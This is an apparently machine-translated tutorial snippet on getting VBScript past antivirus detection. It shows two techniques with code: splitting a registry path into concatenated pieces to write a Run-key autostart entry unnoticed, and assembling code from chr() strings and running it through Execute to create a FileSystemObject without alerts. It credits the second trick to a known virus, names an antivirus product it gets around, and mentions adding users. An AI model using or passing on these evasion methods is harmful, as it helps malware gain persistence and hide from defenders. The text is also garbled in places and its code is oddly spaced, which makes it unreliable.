Anti-Virus is quite sensitive to vbs and does not kill

Copy codeThe Code is as follows:

Currently, anti-virus is very sensitive to vbs. As long as you find that xx is used for the Registry, or use vbs to run commands (add users), it may be killed. The following interview 2 method can be easily solved:

1. Use the connector "&" for example:
Set CURObj = CreateObject ("Wscript. Shell ")
Mhk = "HK" & "LM \ SOFT" & "WARE \ Micr" & "osoft \ Win" & "dows \ Curren" & "tVersion \ Run \"
CURObj. RegWrite "" & mhk & "internat.exe", "internat.exe"

2. Use the Execute function (BY animation shark)

Some anti-virus software, such as rising, will monitor the code on the webpage. Once you create FSO or write the registry, even normal scripts will report danger, but why didn't I trigger an alarm when FSO was used for new happy times? The reason is that the virus uses the Execute function to escape the firewall. The virus converts this declaration code to a String and then runs it through the Execute (String) function. For example:
Str = "set fso = CreateObject (" & chr (34) & "scrip" & chr (116) & "ing. FileSystemObject" & chr (34 )&")"
Msgbox str
Execute str
Put the above Code in test. vbs and FSO will be created, and rising will not trigger an alarm.